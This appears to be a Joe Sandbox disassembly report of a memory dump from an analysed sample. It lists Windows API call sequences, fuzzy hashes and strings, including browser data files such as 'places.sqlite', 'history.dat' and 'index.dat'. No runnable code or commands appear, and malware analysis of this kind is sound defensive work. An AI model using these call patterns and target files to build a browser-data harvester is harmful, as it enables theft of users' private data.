                                      • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                      • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                      • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??3@DeleteObject
                                      • String ID: r!A
                                      • API String ID: 1103273653-628097481
                                      • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                      • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                      • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                      • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??2@
                                      • String ID:
                                      • API String ID: 1033339047-0
                                      • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                      • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                      • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                      • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                      APIs
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                      • memcmp.MSVCRT ref: 00444BA5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: AddressProc$memcmp
                                      • String ID: $$8
                                      • API String ID: 2808797137-435121686
                                      • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                      • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                      • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                      • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                      APIs
                                        • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                        • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                        • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                        • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                        • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                        • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                        • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                        • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                        • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                      • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                        • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                        • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                        • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                      • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                      • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                        • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                        • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                        • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                      • String ID:
                                      • API String ID: 1042154641-0
                                      • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                      • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                      • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                      • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                      APIs
                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                      • memset.MSVCRT ref: 00403A55
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                      • String ID: history.dat$places.sqlite
                                      • API String ID: 3093078384-467022611
                                      • Opcode ID: 0c274ad9edd89bdaee4b75b71e6135e93619d7a2ee9880ee8e8ee1fd3ca0b265
                                      • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                      • Opcode Fuzzy Hash: 0c274ad9edd89bdaee4b75b71e6135e93619d7a2ee9880ee8e8ee1fd3ca0b265
                                      • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                      APIs
                                        • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                      • GetLastError.KERNEL32 ref: 00417627
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ErrorLast$File$PointerRead
                                      • String ID:
                                      • API String ID: 839530781-0
                                      • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                      • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                      • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                      • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: FileFindFirst
                                      • String ID: *.*$index.dat
                                      • API String ID: 1974802433-2863569691
                                      • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                      • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                      • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                      • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??3@mallocmemcpy
                                      • String ID:
                                      • API String ID: 3831604043-0
                                      • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                      • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                      • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                      • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                      APIs
                                      • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                      • GetLastError.KERNEL32 ref: 004175A2
                                      • GetLastError.KERNEL32 ref: 004175A8
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ErrorLast$FilePointer
                                      • String ID:
                                      • API String ID: 1156039329-0
                                      • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                      • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                      • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                      • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                      • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                      • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: File$ChangeCloseCreateFindNotificationTime
                                      • String ID:
                                      • API String ID: 1631957507-0
                                      • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                      • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                      • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                      • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                      APIs
                                      • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                      • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Temp$DirectoryFileNamePathWindows
                                      • String ID:
                                      • API String ID: 1125800050-0
                                      • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                      • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                      • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                      • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: d
                                      • API String ID: 0-2564639436
                                      • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                      • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                      • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                      • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID: BINARY
                                      • API String ID: 2221118986-907554435
                                      • Opcode ID: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                      • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                      • Opcode Fuzzy Hash: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                      • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                      APIs
                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                      • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                        • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                        • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                        • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                      • String ID:
                                      • API String ID: 1161345128-0
                                      • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                      • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                      • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                      • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _wcsicmp
                                      • String ID: /stext
                                      • API String ID: 2081463915-3817206916
                                      • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                      • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                      • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                      • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _wcsicmp
                                      • String ID: .#v
                                      • API String ID: 2081463915-507759092
                                      • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                      • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                      • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                      • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                      APIs
                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                      • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                      • String ID:
                                      • API String ID: 159017214-0
                                      • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                      • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                      • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                      • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                      APIs
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                      • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                      • String ID:
                                      • API String ID: 3150196962-0
                                      • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                      • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                      • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                      • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                      APIs
                                      Strings
                                      • failed to allocate %u bytes of memory, xrefs: 004152F0
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: malloc
                                      • String ID: failed to allocate %u bytes of memory
                                      • API String ID: 2803490479-1168259600
                                      • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                      • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                      • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                      • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                      • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                      • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                      • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcmpmemset
                                      • String ID:
                                      • API String ID: 1065087418-0
                                      • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                      • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                      • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                      • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID:
                                      • API String ID: 2221118986-0
                                      • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                      • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                      • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                      • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                      APIs
                                        • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                        • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                        • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                        • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                      • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                      • String ID:
                                      • API String ID: 1481295809-0
                                      • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                      • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                      • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                      • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                      APIs
                                        • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                      • String ID:
                                      • API String ID: 3150196962-0
